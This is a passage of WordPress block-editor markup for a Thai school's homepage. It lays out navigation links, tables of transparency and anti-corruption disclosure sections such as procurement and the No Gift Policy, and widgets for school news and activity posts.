data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid 